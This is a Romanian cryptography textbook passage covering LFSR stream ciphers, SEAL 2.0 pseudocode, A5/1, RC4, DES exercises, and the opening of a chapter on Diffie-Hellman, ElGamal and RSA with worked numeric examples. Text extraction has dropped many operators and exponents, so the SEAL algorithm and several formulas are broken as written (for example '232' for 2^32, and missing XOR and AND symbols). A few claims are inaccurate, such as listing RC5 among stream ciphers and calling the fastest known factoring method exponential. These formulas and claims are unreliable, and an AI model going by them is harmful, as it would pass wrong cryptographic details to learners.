Problema este că aceste implementări sunt ineficiente din punct de vedere al vitezei. Pentru
a rezista atacului de corelaţie, funcţia de feedback trebuie să fie un polinom dens, ceea ce presupune
multe calcule, care produc la ieşire un singur bit, deci trebuie repetate des. Totuşi, cele mai multe
sisteme de criptare militare se bazează pe LFSR.
O metrică importantă folosită pentru a analiza generatoarele bazate pe LFSR este
complexitatea liniară, definită ca fiind lungimea n a celui mai scurt LFSR care poate produce
ieşirea generatorului. Orice şir generat de o maşină de stare finită peste un câmp finit are o
complexitate liniară finită. Complexitatea liniară este importantă deoarece un algoritm simplu,
Berlekamp-Massey (algoritm de căutare a celui mai scurt registru LFSR), poate genera LFSR-ul de
definiţie examinând doar 2n biţi din cheie, ceea ce însemnă spargerea cifrului şir.
Concluzia este că o complexitate liniară ridicată nu înseamnă neapărat un generator sigur,
dar o complexitate liniară scăzută indică un generator fără securitate.
Criptografii încearcă să obţină o complexitate liniară ridicată prin combinarea ieşirilor mai
multor LFSR-uri într-un mod nonliniar. Pericolul este ca unul sau mai multe şiruri interne generate
– de obicei ieşiri ale LFSR-urilor individuale – să fie corelate cu şirul combinat, ceea ce permite un
atac bazat pe algebra liniară numit atac de corelaţie. Imunitatea de corelare poate fi precis definită
17
şi există o legătură între aceasta şi complexitatea liniară. Ideea de bază a atacului de corelaţie este
identificarea unor corelaţii între ieşirea generatorului şi ieşirea uneia din componentele sale interne.
Apoi, observând şirul de ieşire, se pot obţine informaţii despre ieşirea internă. Folosind aceste
informaţii şi alte corelaţii se colectează informaţii despre celelalte ieşiri interne ale generatorului,
până când acesta este spart în totalitate.
Printre cifrurile flux mai frecvent utilizate se numără cifrurile SEAL, A5, RC4, RC5, FISH,
etc.

6.3.4. Cifrul SEAL


Cifrul SEAL (Software-Optimized Encryption ALgorithm) este un sistem de criptare aditiv
binar (adică are la bază operaţia  - XOR), a fost elaborat în 1993 de către Phillip Rogaway şi Don
Coppersmith. Este unul din cele mai eficiente sisteme implementabile pe procesoare de 32 biţi.
SEAL este o funcţie pseudo-aleatoare care scoate o cheie fluidă de L biţi folosind un număr n de 32
biţi şi o cheie secretă a de 160 biţi (figura 6.12).
Fie A, B, C, D, Xi, Yj – cuvinte de 32 biţi. Pentru descrierea algoritmului vom folosi notaţiile:
 A – complementul lui A (pe biţi);
 A  B, A  B, A  B – operaţiile OR, AND şi XOR (pe biţi);

 A  s – deplasarea ciclică a lui A spre stânga cu s poziţii;


 A  s – deplasarea ciclică a lui A spre dreapta cu s poziţii;
 A  B (mod 2 32 ) – suma lui A şi B (considerate ca numere întregi fără semn);
 f ( B, C , D)  ( B  C )  ( B  D) ;

 h( B, C , D)  B  C  D;

 A || B – concatenarea lui A cu B;

 ( X 1 , X 2 , ..., X n )  (Y1 , Y2 , ...,Yn ) – atribuire simultană.


În continuare o succesiune de 32 biţi se va numi „cuvânt” iar succesiunea d 8 biţi se va numi
„octet”. O succesiune vidă este notată cu .
În primul rând trebuie de generat tabelele T, R şi S, fiecare din care este în funcţie de cheia
a. Unica misiune a cheii a în algoritm este de a genera aceste tabele prin intermediul funcţiei G,
construite în baza cunoscutului algoritm al funcţiei hash SHA-1 care este un standard de stat în
SUA (mai bine zis era la momentul respectiv, mai detaliat funcțiile hash vor fi descrise în capitolul
8).

18
Figura 6.12. Schema ciclului intern SEAL
Algoritmul de generare a tabelei G pentru SEAL 2.0 este următorul:
Intrare: un şir a de 160 biţi şi un întreg i (0 ≤ i < 232).
Ieşire: Ga(i) – şir de 160 biţi.
1. Se definesc constantele (de 32 biţi):
y1 = 0x5a827999,
y2 = 0x6ed9eba1,
y3 = 0x8f1bbcdc,
y4 = 0xca62c1d6
2. a. X0 ← i;
b. for j ← 1 to 15 do Xj ← 0x00000000;
c. for j ← 16 to 79 do Xj ← ((Xj −3  Xj −8  Xj −14  Xj −16) << 1);
d. (A, B, C, D, E) ← (H0 , H1, H2, H3, H4) unde a =H0 H1 H2 H3 H4;
e. (Runda 1): for j ← 0 to 19 do
t ← ((A << 5) + f(B, C, D) + E + X j + y1 );
(A, B, C, D, E) ← (t, A, B << 30, C, D);
f. (Runda 2): for j ← 20 to 39 do
t ← ((A << 5) + h(B, C, D) + E + X j + y2);
(A, B, C, D, E) ← (t, A, B << 30, C, D);
g. (Runda 3): for j ← 40 to 59 do
t ← ((A << 5) + h(B, C, D) + E + X j + y3);
(A, B, C, D, E) ← (t, A, B << 30, C, D);
h. (Runda 4): for j ← 60 to 79 do
t ← ((A << 5) + h(B, C, D) + E + X j + y4);
(A, B, C, D, E) ← (t, A, B << 30, C, D);
i. (H0 , H1, H2, H3, H4) ← (H0 +A, H1+B, H2+C, H3+D, H4+E) ;
Ga(i) = H0 || H1 || H2 || H3 || H4 .

19
Generatorul de chei fluide pentru SEAL 2.0 – SEAL(a, n):
Intrare: a – cheia secretă (160 biţi), n  [0, 232 ) – întreg,
L - lungimea solicitată pentru cheia fluidă.
Ieşire: cheia fluidă y, |y|  L ,unde L este primul multiplu de 128 din
intervalul [ L, ).

1. Se generează tabelele T, S, R având ca elemente cuvinte de 32 biţi. Fie funcţia Fa (i )  H ii(mod5)

unde H 0i H1i H 2i H 3i H 4i  Ga ( i / 5 ).

a. for i ← 0 to 511 do T[i] ← Fa (i ) ;

b. for j ← 0 to 255 do S[j] ← Fa (0 x00001000 j ) ;


c. for k←0 to 4  ( L  1) / 8192  1 do R[k] ← Fa (0 x00002000 k );
2. Descrierea procedurii Initialize (n, l, A, B, C, D, n1, n2, n3, n4) cu intrările n (cuvânt) şi l (întreg) şi
ieşirile A, B, C, D, n1, n2, n3, n4 (cuvinte).
a. A← nR[4·l], B←(n >> 8)R[4·l+1], C ← (n >>16)R[4·l+2],
D ← (n >> 24)R[4·l+3];
b. for j ← 1 to 2 do
P ← A  0x000007fc, B ← B + T [P/4], A ← (A >> 9),
P ← B  0x000007fc, C ← C + T [P/4], B ← (B >> 9),
P ← C  0x000007fc, D ← D + T [P/4], C ← (C >> 9),
P ← D  0x000007fc, A ← A + T [P/4], D ← (D >> 9),
(n1, n2, n3, n4) ← (D, A, B, C);
P ← A  0x000007fc, B ← B + T [P/4], A ← (A >> 9),
P ← B  0x000007fc, C ← C + T [P/4], B ← (B >> 9),
P ← C  0x000007fc, D ← D + T [P/4], C ← (C >> 9),
P ← D  0x000007fc, A ← A + T [P/4], D ← (D >> 9);
3. l ← 0, y ←  (şirul vid);
4. repeat
a. Initialize(n, l, A, B, C, D, n1, n2, n3, n4);
b. for i ← 1 to 64 do
P ← A  0x000007fc, B ← B + T [P/4], A ← (A >> 9), B ← B  A;
Q ← B  0x000007fc, C ← C + T [Q/4], B ← (B >> 9), C ← C  B;
P ← (P + C)  0x000007fc, D ← D + T [P/4], C ← (C >> 9), D ← D  C;
Q ← (Q + D)  0x000007fc, A ← A + T [Q/4], D ← (D >> 9), A ← A  D;
P ← (P + A)  0x000007fc, B ← B + T [P/4], A ← (A >> 9);

20
Q ← (Q + B)  0x000007fc, C ← C + T [Q/4], B ← (B >> 9);
P ← (P + C)  0x000007fc, D ← D + T [P/4], C ← (C >> 9);
Q ← (Q + D)  0x000007fc, A ← A + T [Q/4], D ← (D >> 9);
y ← y||(B + S[4·i − 4]) || (C  S[4·i − 3]) || (D + S[4·i − 2]) || (A  S[4·i − 1]).
if |y| ≥ L then return(y) STOP
else if i (mod 2) = 1 then (A, C) ← (A + n1, C + n2 )
else (A, C) ← (A + n3, C + n4 );
c. l ← l + 1.
Menţionăm că în majoritatea aplicaţiilor pentru SEAL 2.0 se foloseşte L ≤ 219 . Algoritmul
funcţionează şi pentru valori mai mari, dar devine ineficient deoarece creşte mult dimensiunea
tabelei R. O soluţie este concatenarea cheilor fluide SEAL(a, 0) || SEAL(a, 1) || SEAL(a, 2) ||…
Deoarece n < 232, se pot obţine astfel chei fluide de lungimi până la 251, păstrând L = 219.
Pentru algoritmul SEAL nu sunt publicate metode eficiente de spargere. În anul 1997 a fost
publicat o metodă de atac bazată pe Criptanaliza  2 care permite determinarea unei părţi mari din
tabelele interne, însă era aplicabilă numai la o versiune simplificată a lui SEAL. Trebuie de
menţionat aici că Don Coppersmith (care este şi coautor al lui DES) este şi unul dinte cei mai abili
criptanalişti. La ziua de azi ultima dintre versiunile acestui cifru este SEAL 3.0, care este și cea mai
rezistentă la atacuri.

6.3.5. Cifrul A5
Cifrul A5 (în prezent numit A5/1) este un cifru stream sincron folosit pentru a cripta fluxul
de date GSM, reprezentând inițial standardul european și cel din SUA pentru telefonia mobilă
celulară. A5 criptează linia dintre telefon şi celula de bază, restul legăturii rămânând necriptată.
Pentru alte țări a fost elaborată o modificare A5/2, care este însă mai puțin sigură. A5 este format
din trei LFSR-uri, care au registre de lungime 19, 22 şi respectiv 23. Toate polinoamele de feedback
sunt cu un număr redus de coeficienţi. Ieşirea este obţinută prin operarea XOR a celor trei LFSR-
uri. A5 foloseşte un clock control variabil. Fiecare registru face un clocking bazat pe bitul central,
care este operat XOR cu inversa funcţiei prag (threshold function) a biţilor de la mijlocul celor trei
registre. Un registru este sincronizat dacă bitul său de sincronizare (cel portocaliu) este în
concordanţă cu unul sau ambii biţi de sincronizare ale celorlalte două registre (figura 6.12). În mod
normal, două din LFSR-uri sunt sincronizate la fiecare iteraţie.

21
Figura 6.12. Cifrul A5/1
Există un atac trivial care necesită 240 criptări: se ghiceşte conţinutul primelor două LFSR,
apoi se determină al treilea din şirul generat. În ciuda acestui fapt, A5 este bine proiectat şi este
extrem de eficient. El trece cu succes toate testele statistice cunoscute şi singura sa slăbiciune rezidă
în faptul că registrele sunt scurte, ceea ce face posibilă o căutare exhaustivă. Variantele A5 cu
registre lungi şi polinoame feedback dense au un grad de siguranţă sporit.

6.3.6. Cifrul RC4


Cifrul RC4 este un cifru şir cu cheie de lungime variabilă, dezvoltat în 1987 de către Ron
8
Rivest pentru RSA Data Security și utilizat pe scară largă în diferite sisteme de securitate a
informațiilor din rețelele de calculatoare (de exemplu, în protocoalele SSL și TLS, algoritmi de
securitate wireless WEP și WPA). În 1994 codul sursă al algoritmului este făcut public pe Internet.
RC4 este un algoritm simplu de realizat software: şirul cheie este independent de textul clar.
Funcţionează în baza „cutiilor-S”: S0, S1, ..., S255. Intrările sunt permutări ale numerelor de la 0 la
255, iar permutarea este o funcţie de o cheie de lungime variabilă. Există doi indici, i şi j, iniţializaţi
cu zero. Pentru a genera un octet aleator se procedează astfel:
i = (i + 1) mod 256; j = (j + Si) mod 256;
T = Si; Si = Sj; Sj = T; t = (Si + Sj) mod 256;
K = St .
Octetul K este operat XOR cu textul clar pentru a produce text cifrat sau operat XOR cu
textul cifrat pentru a obţine textul clar. Criptarea este aproape de 10 ori mai rapidă decât DES-ul.
Iniţializarea “cutiilor-S” este simplă. Se iniţializează liniar:
S0 = 0, S1 = 1, …, S255 = 255

8
Ronald Lorin Rivest (n. 1947, Schenectady, SUA) este un criptograf american, profesor de informatică la MIT. Este
cunoscut datorită muncii sale, împreună cu colegii Leonard Adleman și Adi Shamir în domeniul criptografiei cu chei
publice și în mod deosebit pentru inventarea algoritmului RSA, pentru care a primit în 2002 premiul Turing de la ACM.
Rivest a inventat și algoritmii de criptare cu cheie secretă RC2, RC4, RC5 și a colaborat la crearea RC6. Inițialele RC
înseamnă Cifrul Rivest (în engleză Rivest Cipher). De asemenea, a inventat funcțiile hash criptografice MD2, MD4 și
MD5.
22
şi un alt vector de 256 de octeţi cu cheia, repetând cheia, dacă este necesar, pentru a completa
vectorul cu componentele K0, K1, …, K255 :
j = 0;
For i = 0 to 255:
j = ( j + Si + Ki ) mod 256;
se schimbă Si cu Sj între ele.
Pe parcursul utilizării lui RC4 au fost depistate mai multe slăbiciuni, iar cea mai importantă
dintre ele provine de la generatorul de chei - primii octeți ai fluxului cheii nu sunt totalmente
aleatori și dezvăluie informații despre cheie (atacul Fluhrer). Acest lucru poate fi corectat pur și
simplu prin eliminarea unei secvențe inițiale a fluxului cheii, modificarea fiind cunoscută ca RC4-
dropN, unde N este de obicei un multiplu al lui 256 care indică numărul de octeți de la începutul
fluxului cheii care trebuiesc eliminați. Pentru a consolida RC4 au fost făcute mai multe încercări,
cele mai notabile fiind Spritz, RC4A, VMPC și RC4 +.
În sistemele simetrice de criptare, Alice şi Bob îşi aleg o cheie secretă k care defineşte
regulile de criptare ek şi decriptare dk. În aproape toate cazurile ek şi dk coincid sau se pot deduce
imediat una din alta. Un punct slab al sistemelor cu cheie privată este acela că necesită o
comunicare prealabilă a cheii între Alice şi Bob printr-un canal sigur, înainte de transmiterea
mesajului criptat. Practic, în condiţiile cererii tot mai mari de securizare a comunicaţiilor, acest
lucru este din ce în ce mai dificil de realizat. Astfel a apărut necesitatea de a crea sisteme care au alt
concept de transmitere a cheii.

6.4. Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Faceți o analiză comparativă a criptării simetrice cu cifruri bloc și flux.
2. Calculați numărul total de chei ale algoritmilor simetrici necesare pentru schimbul de
informație criptată între 20 de persoane.
3. Descrieți principiile generale ale funcționării Data Encryption Standard.
4. Ce reprezintă cutiile S și cutiile P în cifrurile bloc? Care sunt principiile de
funcționare ale acestor curii?
5. Realizați un studiu și descrieți în el funcționarea unui algoritm modern de criptare în
un din aplicațiile software moderne.
6. Explicați în ce constă deosebirea substanțială a cifrurilor stream și bloc.
7. Descrieți principiul de lucru a algoritmilor de cifrare sincrone și a celor asincrone.
8. Ce reprezintă și unde sunt aplicate registrele de deplasare cu feedback?
9. În algoritmul DES este dat mesajul M=Alfabetul. De aflat L1 pentru primul bloc al
mesajului.
10. În algoritmul DES este dat mesajul M=Alfabetul. De aflat E(R0) pentru primul bloc al
mesajului.
11. În runda 12 a algoritmului DES am obţinut
K12 + E(R11)= 011100 010101 011010 110110 101001 101010 011000 101101
23
Să se determine S6(B6).
12. În runda 3 a algoritmului DES în rezultatul aplicării cutiilor-S s-a obţinut:
0110 0101 0110 1110 1011 1010 0100 1011.
Să se calculeze R3, dacă L2= 0100 0111 0110 1110 1001 1000 0110 1101.
13. La criptarea unui bloc în cifrul DES s-a obţinut
L16 = 0110 0111 0010 0110 0011 0010 0011 0100,
R16 = 0000 1010 0110 1100 1100 1001 1001 0111.
Să se determine blocul criptat al mesajului.

24
TEMA 7: CRIPTOGRAFIA ASIMETRICĂ

Obiectivele temei:
 Introducere în criptarea cu cheie publică.
 Analiza algoritmului schimbului de chei Diffie-Hellman.
 Analiza algoritmului de criptare ElGamal.
 Analiza Algoritmului de criptare RSA.
 Familiarizarea cu infrastructura cheilor publice (PKI).

Cuvinte-cheie:
criptare asimetrică, calculul puterii modulo n,
cheie publică, calculul inversului modulo n,
cheie privată, autoritate de certificare,
distribuirea cheilor, autoritate de înregistrare,
problema logaritmului discret, arhitecturi PKI.

Conceptul de criptografie asimetrică sau criptografie cu cheie publică a fost inventat de


Whitfield Diffie şi Martin Hellman. Contribuţia lor constă în propunerea de a folosi un nou concept
de criptare în care cheile de criptare şi decriptare sunt diferite, iar cheia de decriptare (care este
secretă) nu poate fi dedusă din cheia de criptare (care este publică). În anul 1976 conceptul a fost
prezentat în premieră la National Computer Conference în SUA, iar câteva luni mai târziu lucrarea a
fost publicată.

7.1. Noțiune de criptare cu cheie publică


Algoritmii de criptare cu cheie publică (sau algoritmii asimetrici) au un mare avantaj faţă de
algoritmii cu cheie secretă: oricine poate transmite un mesaj secret utilizatorului (cunoscându-i
cheia publică), iar mesajul rămâne protejat faţă de interceptor. Cu un sistem cu cheie secretă pentru
fiecare pereche de utilizatori este necesară câte o cheie separată.
În general, un sistem cu n utilizatori ai unui algoritm de criptare cu cheie secretă necesită
n(n  1)
chei, pentru ca oricare pereche de utilizatori să poată comunica între ei şi mesajele lor să
2
rămână secrete faţă de ceilalţi utilizatori. Numărul de chei creşte rapid o dată cu numărul de
utilizatori, iar generarea, distribuirea şi menţinerea securităţii cheilor constituie o problemă datorită
numărului lor mare.
Într-un algoritm cu cheie publică, un utilizator deţine două chei: o cheie publică şi o cheie
privată (secretă). Utilizatorul îşi poate face cunoscută oricui cheia publică. Fie SK cheia secretă şi
PK cheia publică corespunzătoare. Atunci:
m=d(SK, e(PK, m)),
adică utilizatorul poate decripta cu cheia privată ceea ce oricine altcineva a criptat cu cheia publică
corespunzătoare.
Cu al doilea algoritm de criptare cu cheie publică utilizatorul poate cripta un mesaj cu cheia
privată, iar mesajul poate fi decriptat doar cu cheia publică corespunzătoare
m=d(PK, e(SK, m)).
Aceste două proprietăţi presupun că cele două chei, publică şi privată, pot fi aplicate în orice
ordine (algoritmul asimetric RSA nu face distincţie între cheia publică şi cheia privată; orice cheie
din perechea de chei poate fi folosită fie ca cheie publică, fie ca cheie privată).
O schemă de criptare cu cheie publică conține trei algoritmi (figura 7.1):
1. generatorul de chei, care returnează o pereche cheie secretă-cheie publică (SK, PK);
2. algoritmul de criptare, care primeşte la intrare un mesaj m din mulţimea mesajelor
posibile, o cheie publică PK şi returnează textul cifrat c.
3. algoritmul de decriptare, care ia ca intrare un text cifrat c din mulţimea textelor
cifrate, o cheie secretă SK şi returnează un mesaj m.

Figura 7.1. Schema unui algoritm cu cheie publică

Trebuie de menţionat aici unele condiţii care trebuie respectate:


 receptorul B poate uşor să genereze cheia publică PKB şi cheia privată SKB;
 emiţătorul A, ştiind cheia publică a lui B şi mesajul clar m, poate să genereze textul cifrat
corespunzător:
c  ePK B (m);

 receptorul B poate uşor să decripteze textul cifrat c:


m  d SK B (c)  d SK B (ePK B (m));

 un atacator care ştie PKB nu poate să determine cheia privată SKB;


 un atacator care ştie cheia publică PKB şi textul cifrat c nu poate să determine mesajul
original m;
 are loc următoarea relaţie (menţionată mai sus):
2
m  d SK B (ePK B (m))  d PK B (eSK B (m)).

La momentul actual cei mai cunoscuți algoritmi de criptare cu cheie publică sunt:
 algoritmul RSA: se bazează pe dificultatea descompunerii în factori primi a numerelor
mari (de sute de cifre); este sistemul cel mai larg utilizat în acest moment;
 algoritmul ElGamal: se bazează pe dificultatea calculului logaritmului discret într-un
corp finit;
 algoritmul Merkle-Hellman: primul algoritmul definit cu cheie publică, bazat pe
problema {0, 1} a rucsacului, problemă NP – completă;
 algoritmul McEliece: este bazat pe teoria algebrică a codurilor, decodificarea unui cod
liniar fiind de asemenea o problemă NP – completă;
 curbe eliptice: sunt algoritmi de criptare care îşi desfăşoară calculele pe mulţimea
punctelor unei curbe eliptice.

7.2. Algoritmul schimbului de chei Diffie-Hellman


Atât conceptul criptării cu chei publice cât şi primul algoritm publicat care folosea chei
publice a fost dezvoltat de W. Diffie şi M. Hellman. Algoritmul este numit Diffie-Hellman key
exchange (1976) este folosit în numeroase produse comerciale. Acest algoritm nu se aplică la
criptarea mesajelor sau la crearea de semnături digitale. Scopul său este distribuirea cheilor, adică
scopul este ca doi utilizatori să poată schimba o cheie secretă în siguranţă, deci algoritmul este
limitat la schimbul cheilor secrete.

7.2.1. Problema logaritmului discret


Algoritmul Diffie-Hellman este bazat pe problema complicată a determinării logaritmului
discret. Să încercăm o explicaţie succintă acestei noţiuni.
În matematică, un grup este o structură algebrică ce constă dintr-o mulțime pe care este
definită o operație (în continuare vom considera operația de înmulțire) care combină două elemente
ale mulțimii pentru a forma un al treilea element al aceleiași mulțimi. Pentru a fi un grup, mulțimea
și operația trebuie să satisfacă o serie de condiții, denumite axiomele grupurilor, și anume
asociativitatea, existența elementului neutru și a elementului simetric. Grupul pe care este definită
operația de înmulțire se numește grup multiplicativ. Ordinul unui grup G, notat ord(G) sau |G|, este
numărul elementelor grupului.
Un grup ciclic este un grup ale cărui elemente sunt puteri ale unui element a din grup (când
operația de grup este considerată a fi de natură aditivă, se preferă termenul multipli). În notația
multiplicativă, elementele grupului sunt: ..., a−3, a−2, a−1, a0 = e, a, a2, a3, ..., unde a2 înseamnă a·a,
și a-3 reprezintă a-1·a-1·a-1= (a·a·a) -1 etc. Un astfel de element a se numește generator sau element
primitiv al grupului, care de obicei se notează cu α sau g.

3
Pentru comoditate şi exactitate vom considera G – un grup multiplicativ Zp* de ordin p  1,
cu p – număr prim, unde operaţia este înmulţirea modulo p.
1 2 10
Exemplu. Fie p = 11 și α=2. Atunci Z11
*
 {2 mod11, 2 mod11,…, 2 mod11}=

={2, 4, 8, 5, 10, 9, 7, 3, 6, 1}= {1, 2, 3, 4, 5, 6, 7, 8, 9, 10}. Așadar, Z11* este un grup ciclic
multiplicativ de ordinul n=10 și elementul generator α = 2.
Fie G - un grup ciclic de ordinul n şi α – elementul generator al său. Fie β – un element din
G. Logaritmul discret β în baza α, care se notează cu logα β, este unicul număr întreg a,
0  a | G | 1 , astfel încât  =  .
a

Exemplu. Fie p = 97. Atunci Z 97


*
este un grup ciclic multiplicativ de ordinul n = 96.

Elementul generator al grupului este α = 5. Deoarece 532  35 (mod 97), avem log535 = 32 în Z 97
*
.

Unele proprietăţi ale logaritmilor discreţi:


 log  (  )  (log    log   ) mod n;

 log   s  s  log   mod n.

Problema logaritmului discret (DLP – Discrete Logarithms Problem) constă în următoarele:


fiind date un grup ciclic finit G = Zp*, un generator α al lui G şi un element y din G,
se cere să se găsească un număr întreg a, 0 ≤ a ≤ p – 2, astfel încât y =  a (mod p).

7.2.2. Descrierea algoritmului Diffie-Hellman


Algoritmul Diffie-Hellman pentru schimbul de chei constă în următoarele (figura 7.2):
 Alice şi Bob convin asupra unui număr mare prim p şi a unui generator ;
 Alice alege (generează aleator) un număr secret a, şi îl trimite lui Bob numărul A:
A =  a (mod p);
 Bob alege (generează aleator) un număr secret b, şi îl trimite lui Alice numărul B:
B =  b (mod p);
 Alice calculează B a mod p = ( b mod p) a mod p) = k;
 Bob calculează Ab mod p = ( a mod p) b mod p) = k.

Figura 7.2. Schema schimbului de chei Diffie-Hellman

4
Exemplu de utilizare a schimbului de chei Diffie-Hellman:
 Alice şi Bob convin asupra lui p = 23 şi  = 5.
 Alice alege aleatoriu a = 6 şi îi trimite lui Bob A = 56 mod 23=8.
 Bob alege aleatoriu b = 15 şi trimite lui Alice 515 mod 23 = 19.
 Alice calculează 196 mod 23 = 2.
 Bob calculează 815 mod 23 = 2.
 Alice şi Bob au abţinut aleşi rezultat, deci cheia secretă comună este k = 2.
Cheia secretă stabilită de cei doi utilizatori Alice şi Bob este k. Menţionăm că p şi  nu este necesar
de ţinut în secret.
În realizările practice ale Algoritmului Diffie-Hellman NIST recomandă pentru perioada
2016-2030 utilizarea cheilor de cel puțin 224 biți, iar a modulului p – de cel puțin 2048 biți, ceea ce
corespunde în reprezentarea zecimală la 68 și respectiv 617 cifre (acești parametri sunt recomandați
pentru toți algoritmii care funcționează în baza problemei logaritmului discret). Numărul α
(generatorul) nu este neapărat mare şi de obicei are valori mai mici ca 10. Ţinând cont de aceste
mărimi ale parametrilor a, b şi p putem afirma cu certitudine că securitatea algoritmului este
asigurată, deoarece determinarea cheii secrete cunoscând numai α, p,  b mod p,  b mod p (fără a
cunoaşte a şi b – ele fiind menţinute în secret) este o problemă extrem de complicată care nu poate
fi rezolvată într-un timp rezonabil.
Algoritmul Diffie-Hellman poate fi utilizat şi pentru criptarea cu cheie secretă. În acest caz
schema este aceeaşi ca şi mai sus însă cu unele particularităţi. Alice nu transmite direct lui Bob
valorile p,  şi A însă le publică din timp, ele având calitatea de cheie publică. Bob la rândul său
efectuează calculele sale, după care cifrează mesajul cu un algoritm simetric, folosind k în calitate
de cheie, apoi transmite spre Alice textul cifrat împreună cu valoarea lui B. În practică însă
algoritmul Diffie-Hellman nu este utilizat pentru criptare, deoarece există alți algoritmi cu cheie
publică mai eficienți.

7.3. Algoritmul de criptare ElGamal


Unul dintre algoritmii bazați pe problema logaritmului discret, este algoritmul ElGamal,
care conţine în sine şi algoritmul de semnătură digitală. Schema ElGamal se află la baza
standardului de semnătură digitală în SUA (standardul DSA), precum şi în Federația Rusă (ГОСТ Р
34.10-94) ambele suferind modificări pentru sporirea securității.
Schema a fost propusă de către Taher Elgamal1 în anul 1984. Elgamal a elaborat una din
versiunile algoritmului Diffie-Hellman. El a perfecţionat algoritmul Diffie-Hellman şi a obţinut doi

1
Taher Elgamal, (născut la 18 august 1955) este un criptograf egiptean. Este autorul algoritmului de criptare și a
schemei de semătură digitală ce îi poartă numele. De asemenea, a participat la elaborarea protocolului „SET” de plată
cu carduri de credit și la o serie de scheme de plată prin Internet.
5
algoritmi care sunt utilizaţi pentru criptare şi pentru asigurarea autenticităţii. Algoritmul ElGamal
nu a fost brevetat şi deci este o alternativă mai puţin costisitoare decât altele, deoarece nu este
necesară achitarea unei taxă pentru licenţă. Se consideră că algoritmul ElGamal este acoperit de
brevetul Diffie-Hellman.
Ca și oricare alt algoritm de criptare, ElGmal constă din trei module.
1. Generarea cheilor:
 se generează aleatoriu un număr prim p de n biţi;
 se alege aleatoriu elementul primitiv  al lui Zp*;
 se alege aleatoriu un număr întreg a încât 1 < a ≤ p – 2;
 se calculează y =  a (mod p);
 cheia publică este tripletul (p, , y), cheia privată – numărul a.
2. Cifrarea mesajului m, (m trebuie mai întâi codificat cu ajutorul unuia dintre sistemele de
codificare a caracterelor, aspre exemplu ASCII) în algoritmul ElGamal este de fapt o
modalitate de generare a cheii publice Diffie-Hellman:
 se alege aleatoriu cheia de sesiune – un număr întreg k, 1 < k ≤ p – 2;
 se calculează A =  k (mod p) şi B = y k  m (mod p);
 textul cifrat este perechea de numere (A, B).
Este evident că lungimea textului cifrat cu algoritmul ElGamal este de două ori mai mare
decât lungimea textului clar m.
3. Descifrarea. Cunoscând cheia privată a, textul clar m poate fi calculat din textul cifrat
( A, B) în felul următor:

 m = B (Aa ) –1(mod p);


aceasta este posibili deoarece
 (Aa ) –1 =  – ka mod p;
 B (Aa ) –1 = ( ka m)  – ka = m mod p;
în scopuri practice pentru descifrare este mai convenabilă formula
 m = B (Aa ) –1 = B A(p –1–a) (mod p).
Deoarece în schema ElGamal se introduce o mărime aleatoare k acest cifru poate fi
considerat cifru polialfabetic. Alegerea aleatorie a lui k a generat noţiunea de schemă probabilistică
de cifrare. Caracterul probabilistic cal cifrării reprezintă o prioritate a cifrului ElGaml, deoarece
schemele probabilistice au o rezistenţă mai mare decât alte scheme cu un proces determinist de
cifrare. Dezavantajul schemei ElGamal îl reprezintă dublarea lungimii textului cifrat în raport cu
textul clar. Pentru schemele probabilistice de cifrare mesajul m şi cheia nu determină univoc textul
cifrat. În schema ElGamal este necesar de a alege valori diferite ale mărimii aleatoare k pentru
cifrarea a două mesaje diferite m şi m. Dacă am folosi aceleaşi valori ale lui k pentru textele cifrate
6
1 1
( A, B) şi ( A, B) atunci din relaţia B  ( B)  m  (m) , se poate uşor de calculat m dacă
cunoaştem m.
Exemplu de utilizare a algoritmului ElGamal; textul clar este m = ”A” = 065 = 65, pe care
Alice trebuie să-l trimită cifrat lui Bob. Algoritmul ElGamal va consta în următoarele:
1. Generarea cheilor
 se alege aleatoriu numărul prim p = 281;
 se alege aleatoriu elementul primitiv  = 3 al câmpului Z281*;
 se alege aleatoriu un număr întreg a = 57 încât 1 < a ≤ 279;
 se calculează y =  a (mod p) = 357mod 281= 258;
 cheia publică este tripletul (p, , y) = (281, 3, 258);
 cheia privată este numărul a = 57.
2. Cifrarea
 Alice alege aleatoriu cheia de sesiune k, 1 < k ≤ 279, fie k = 49;
 ea calculează;
A = k (mod p) = 349 mod 281= 146 şi
B = y km (mod p) = (34965) mod 281= (15265) mod 281 = 45;
 textul cifrat este perechea de numere (A, B) = (146, 45);
 Alice transmite lui Bob textul cifrat (146, 45).
3. Descifrarea. Bob, fiind titularul cheii secrete a = 57, primeşte textul cifrat (146, 45) de la
Alice. Pentru descifrarea acestui mesaj el procedează în felul următor:
 m = B (Aa) –1(mod p) = 45 (146 57) –1(mod 281).
 pentru aceasta Bob poate calcula mai întâi 14657mod 281=152;
 apoi calculează 152 –1 mod 281 = 220 (pentru aceasta poate aplica algoritmul Euclid
Extins).
 calculează textul clar
m = (45220) mod 281 = 9900 mod 281 = 65 = 065 = “A”.
 Textul clar putea fi calculat şi fără a aplica calculul inversului – aplicând formula m
= B A(p –1–a) (mod p):
m = 45146(281 –1–57) (mod 281) = 45146223 (mod 281) = 45220 (mod 281) = 9900 (mod 281) = 65.

7
7.4. Algoritmul de criptare RSA
Un alt algoritm de criptare bazat pe o problemă dificilă este Algoritmul RSA, numit astfel
după inventatorii săi, Rivest, Shamir2 şi Adelman3. A fost publicat în 1978 şi rămâne un algoritm
foarte folosit şi astăzi, în ciuda eforturilor criptanaliştilor de a-l sparge.

7.4.1. Descrierea algoritmului RSA


Algoritmul de criptare RSA incorporează rezultate din teoria numerelor, combinate cu
dificultatea determinării factorilor primi pentru un număr ţintă. RSA la fel operează cu aritmetica
modulo n. Un bloc în text clar este tratat ca un întreg, iar pentru criptare şi decriptare se folosesc
două chei, e şi d, care sunt interschimbabile.
Problema pe care se bazează algoritmul de criptare este cea a factorizării numerelor mari.
Problema factorizării nu se cunoaşte a fi NP-completă; cel mai rapid algoritm cunoscut este
exponenţial în timp.
La momentul actual în RSA se utilizează numere prime găsite prin intermediul algoritmilor
probabilistici, cel mai performant fiind testul Miller-Rabin. El este considerat suficient de bun
pentru generarea numerelor prime aplicate în criptografie. Dacă însă acest test ar genera la un
moment dat un număr compus, urmările vor fi imprevizibile pentru utilizatorii algoritmului RSA cu
cheile respective.
Teoretic sunt trei posibilităţi de abordare a unui atac în cazul algoritmului RSA: atacul în
forţă, atacul bazat pe metode matematice (încercarea factorizării produsului a două numere prime
mari) şi atacul temporal. Analiza acestor atacuri duce la concluzia că nici unul nu are sorţi de
izbândă. În pofida unor intense cercetări, au fost identificate doar probleme minore în comparaţie cu
cele din cazul algoritmului rucsacului a lui Merkle şi Hellman.
